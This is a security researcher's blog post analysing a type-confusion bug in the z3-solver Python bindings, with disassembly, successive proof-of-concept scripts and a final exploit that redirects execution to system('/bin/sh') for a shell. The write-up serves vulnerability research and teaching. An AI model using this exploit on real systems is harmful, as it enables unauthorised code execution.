Dev

Exploiting Exploit (z3-solver)

Apr 11, 2022

Author: Hackability | Researcher

This is Hackability, a security analyst at Sooho. In this article, I will summarize the bugs found in the z3 package, which is widely used as an SMT (Satisfiability Modulo Theories) Solver, and the process of using these bugs to obtain a system shell.

Finding the Bug

This bug was discovered accidentally while researching using python-z3, triggered by a crash log.

import z3
z3.BoolRef(0x41414141)
'''
Python 3.6.8 (default, Oct  7 2019, 12:59:55)
[GCC 8.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import z3
>>> z3.BoolRef(0x41414141)
Segmentation fault (core dumped)
'''

Initial Crash Log

Upon checking the related logs, I found that the z3 GitHub issue had already been registered last May, and the developer closed the issue after deeming it not a significant problem.

Type Confusion of Z3_inc_ref version <= 4.7.1 · Issue #1639 · Z3Prover/z3While working with Z3, I found that missing parsing value before call Z3_inc_ref which lead to memory corruption or remote code execution. Let take a look at line z3/src/api/python/z3/z3.py Line 29...GitHubZ3Prover

As someone who was contemplating how to spend the weekend, I felt as though I had discovered an exciting toy. Thus, I began the journey of finding the bug.

What was the result? I found it. A lot...

Bug Analysis and Exploit Writing

Using the Python script fuzzer I created last year, I observed a tremendous amount of Segmentation Fault logs occurring.

However, just because there are logs that caused Segmentation Fault doesn’t mean all logs are exploitable. Therefore, one must analyze the logs to find controllable registers and logic that can manipulate the execution flow. The PoC code I found above was not in the desired format, so I began searching again.

Analyzing the logs, I discovered a vulnerability that meets the above condition. The PoC provided by the fuzzer was as follows.

import z3

def fn_199f2d73ac5b7497():
    return z3.is_int('A' * 0x1000)
def fn_412c5fa7f5598e53():
    return z3.Z3_get_decl_int_parameter('A' * 0x1000, fn_199f2d73ac5b7497(), 0x43434343)
    
fn_412c5fa7f5598e53()

PoC generated from the Python script fuzzer

Upon debugging this, it became apparent that a Segmentation Fault occurred due to referencing incorrect memory, influenced by my input.

Crash Point by PoC script

The reason for selecting this log is that there is a jmp rax call following the crash event. Since rax holds a value manipulated by my input, if I modify the value appropriately from the current crash location to reach jmp rax, I can change the execution flow to my desired path from that point on.

Using the modified PoC, let's analyze step-by-step the location and reason the crash occurred, and how to change the execution flow without causing a crash.

First, the modified PoC is as follows.

import z3

""" for debugging purpose """
input('ready ?')

z3.Z3_get_decl_int_parameter(b'A'*0x100, z3.is_int(1), 0x43434343)

For the first argument, I ensured that a null value is not passed by using a byte sequence, and I input the second and third arguments in the format that occurred with the fuzzer. The input function for debugging was meant to set a breakpoint (bp) when the libz3 was dynamically loaded into memory by running Python. Thus, I execute the PoC first, attach a debugger to that process, and set a bp at the library base address plus the offset of the function I want to track.

After attaching the debugger to the process and checking the memory map, it was confirmed that libz3.so was located in specific memory.

Since the memory map at 0x7f480e578000 has r-xp rights, it is executable; thus, this becomes the code base of the library, and since the offset of the function we want to track is 0xeb870, it seems appropriate to set the bp at 0x7f480e663870.

Additionally, since most recent Linux environments have ASLR (Address Space Layout Randomization) enabled by default, the base address of the library code will change each time the PoC code executes. There are methods for debugging that involve determining the library's base address each time, or alternatively, one can disable ASLR in the system settings. The offsets of library functions are static and do not change.

Entry Point of api::context::set_error_code

It seems I have landed at the desired location. A brief check of the registers shows that rdi, [r10], r12, and r14 seem to be related to the values we input. Additionally, rbx is also assignable through the controllable rdi, making rbx controllable as well.

EB870  push    r13
EB872  push    r12
EB874  push    rbp
EB875  mov     ebp, esi
EB877  push    rbx
EB878  mov     rbx, rdi
EB87B  sub     rsp, 8
EB87F  test    esi, esi
EB881  mov     [rbx+518h], esi
EB887  jnz     short loc_EB898
loc_EB889:
EB889  add     rsp, 8
EB88D  pop     rbx
EB88E  pop     rbp
EB88F  pop     r12
EB891  pop     r13
EB893  retn
EB894  align 8
EB898
loc_EB898:
EB898  mov     rax, [rdi+528h]

At 0xEB887, there is a comparison between [rbx+0x518] and rsi; if they are not equal, it branches to 0xEB898. If there is no branch, the function will end and return, so we need to set a condition to ensure there is a branch.

Condition 1: [rbx+0x518] != rsi

loc_EB898:
EB898  mov     rax, [rdi+528h]
EB89F  mov     r12, rdx
EB8A2  lea     r13, [rdi+528h]
EB8A9  xor     ecx, ecx
EB8AB  xor     esi, esi
EB8AD  mov     rdi, r13
EB8B0  mov     rdx, [rax-18h]
EB8B4  call    __ZNSs9_M_mutateEmmm
EB8B9  test    r12, r12
EB8BC  jz      short loc_EB8D4
EB8BE  mov     rdi, r12
EB8C1  call    _strlen
EB8C6  mov     rsi, r12
EB8C9  mov     rdx, rax
EB8CC  mov     rdi, r13
EB8CF  call    __ZNSs6assignEPKcm
loc_EB8D4:
EB8D4  mov     rax, [rbx+520h]

Checking the next block, rax is assigned [rdi+0x528], and since rdi is the value we set, rax becomes a register we can control at this point as well. Furthermore, r13 is also allocated with [rdi+0x528], which makes r13 a controllable register as well, but it differs from rax. While the value placed in rax comes from rdi+0x528, allowing us to set rax, r13 points to the address of data we can control, therefore does not directly control the r13 value itself. Nonetheless, it's still a useful value as it points to a controllable area.

We maneuver through the calls and branching statements with our set values and reach up to 0xEB8D4.

loc_EB8D4:
EB8D4  mov     rax, [rbx+520h]
EB8DB  test    rax, rax
EB8DE  jz      short loc_EB889
EB8E0  lea     rdx, g_z3_log
EB8E7  cmp     qword ptr [rdx], 0
EB8EB  jz      short loc_EB8F7
EB8ED  lea     rdx, g_z3_log_enabled
EB8F4  mov     byte ptr [rdx]

This section is critical; if we can avoid the branch at 0xEB8DE, we will reach the jmp rax gadget in the execution flow.

Condition 2: test rax, rax (rax != 0)

First, we assign the value of [rbx+0x520] to rax; rbx is the first address of the data we passed as the first argument. In the current PoC test, I input A with 0x100 entries, meaning I cannot ascertain what value will go into the location of 0x520. If I cannot control the value of rbx+0x520, I may hit the branch at test rax, rax, thus failing to follow the desired execution flow.

Based on the analysis results above, I modified the PoC. I now input A with 0x520 entries and B with 8 entries. The expected outcome is that when the execution flow reaches 0xeb8d4, rax's value should become "BBBBBBBB".

import z3

""" for debugging purpose """
input('ready ?')

z3.Z3_get_decl_int_parameter(b'A'*0x520 + b'B'*8, z3.is_int(1), 0x43434343)

modified_poc_02.py

Another Crash Situation

Before reaching our desired location, a segmentation fault occurs. Checking the registers, it appears that the problem arose due to accessing invalid memory, so I investigate why rax received such a value.

loc_EB898:
EB898  mov     rax, [rdi+528h]
EB89F  mov     r12, rdx
EB8A2  lea     r13, [rdi+528h]
EB8A9  xor     ecx, ecx
EB8AB  xor     esi, esi
EB8AD  mov     rdi, r13
EB8B0  mov     rdx, [rax-18h]

rax contains [rdi+0x528]. At the moment the crash occurred, the value of rdi had changed, so checking the registers when assigning rax yields the following.

Situation where rax value is assigned

rdi points to the value we input. We have input 0x528 entries as payload, so we cannot know what the values accessed from 0x528 will be. Therefore, we must add 8 more bytes. The important point here is that the 8 bytes we add should be interpreted as an address, and that address must be accessible by the memory value corresponding to that address - 0x18 to avoid the types of crashes mentioned.

Condition 3: mov rdx, [rax-0x18] (rax-0x18 is valid memory address)

At this point, we need to choose a fixed memory address. A straightforward approach is to refer to the got or bss region of the Python binary to access addresses within that area. Because the Python in this environment has been compiled with the PIE (Position Independent Executable) option disabled, the Python code base is static, meaning data and bss areas should also be static.

The address of the bss area is 0x9b4000, and examining this memory shows the following.

BSS area memory dump

Since rdx accesses [rax-0x18], if I want rdx to become 0x9b4000, I must actually input 0x9b4000+0x18. Based on this, I will restructure the payload as follows.

import z3
import struct

Q = lambda x: struct.pack('Q', x)
UQ = lambda x: struct.unpack('Q', x)[0]

""" for debugging purpose """
input('ready ?')

bss = 0x9b4000

payload = b''
payload += b'A' * 0x520
payload += b'B' * 8
payload += Q(bss + 0x18)

z3.Z3_get_decl_int_parameter(payload, z3.is_int(1), 0x43434343)

Adding fixed address from bss area

When executed, it operates normally as intended and stops due to an error while attempting to jump to BBBBBBBB from jmp rax, as it is an invalid address.

It turned out exactly as we wanted. Now where should we redirect the flow? Generally, to obtain a shell, system or exec commands must be executed.

First, for the system function, the plt is exposed within the Python binary, so I use that address.

Moreover, the address of the string to be passed as the argument to the system provides a pointer to a memory area that we can control. I replace this part with "/bin/sh" and make the necessary modifications. The final form is as follows.

"""
# Author        : hackability (@sooho.io)
# Last Modified : 2019-10-26
# Target        : python (3.6.8) - z3-solver (4.8.6)
# Description   : z3.Z3_get_decl_int_parameter type confusion bug.
"""

import sys
import struct
import z3

Q = lambda x: struct.pack('Q', x)

def print_versions():
    v_python = sys.version.splitlines()[0]
    v_z3 = z3.get_version_string()

    print (f'Python    : {v_python}')
    print (f'z3-solver : {v_z3}')

def exploit():
    plt_system = 0x41f4e0
    bss = 0x9b4100

    """ exploit payload """
    target_1 = b'/bin/sh\x00'
    target_1 += b'A'*0x518
    target_1 += Q(plt_system)
    target_1 += Q(bss)

    """ generated by fuzzer """
    def fn_199f2d73ac5b7497():
        return z3.is_int('A' * 4096)
    def fn_412c5fa7f5598e53():
        return z3.Z3_get_decl_int_parameter(target_1, fn_199f2d73ac5b7497(), 0x43434343)
    fn_412c5fa7f5598e53()

if __name__ == '__main__':
    print_versions()
    exploit()

Final Exploit Code

The results are as follows.

Shell acquired!

Yeah!

Conclusion

In this article, I analyzed the Type Confusion bug that emerged from the script fuzzer targeting the latest version of z3-solver (4.8.6) and created an exploit to obtain a system shell.

Since Python packages interfacing with C libraries often accept Python objects as user input, Type Confusion bugs are frequently exploitable. However, Python, unlike JavaScript, cannot easily enforce strong sandbox policies, making it challenging for developers to respond to such bugs.

This process aligns closely with finding bugs and creating exploits in other applications, so for those not accustomed to bug hunting, starting with Python to gain experience is a good approach.

If you have any questions regarding this article, feel free to reach out.

hackability@sooho.io
https://hackability.kr

For more detailed information or code assistance, contact Sooho.io!

👉 Contact Us

SOOHO.IO Official Channels

Website: https://www.sooho.io/
X (Twitter): https://twitter.com/soohoio
LinkedIn: https://www.linkedin.com/company/sooho/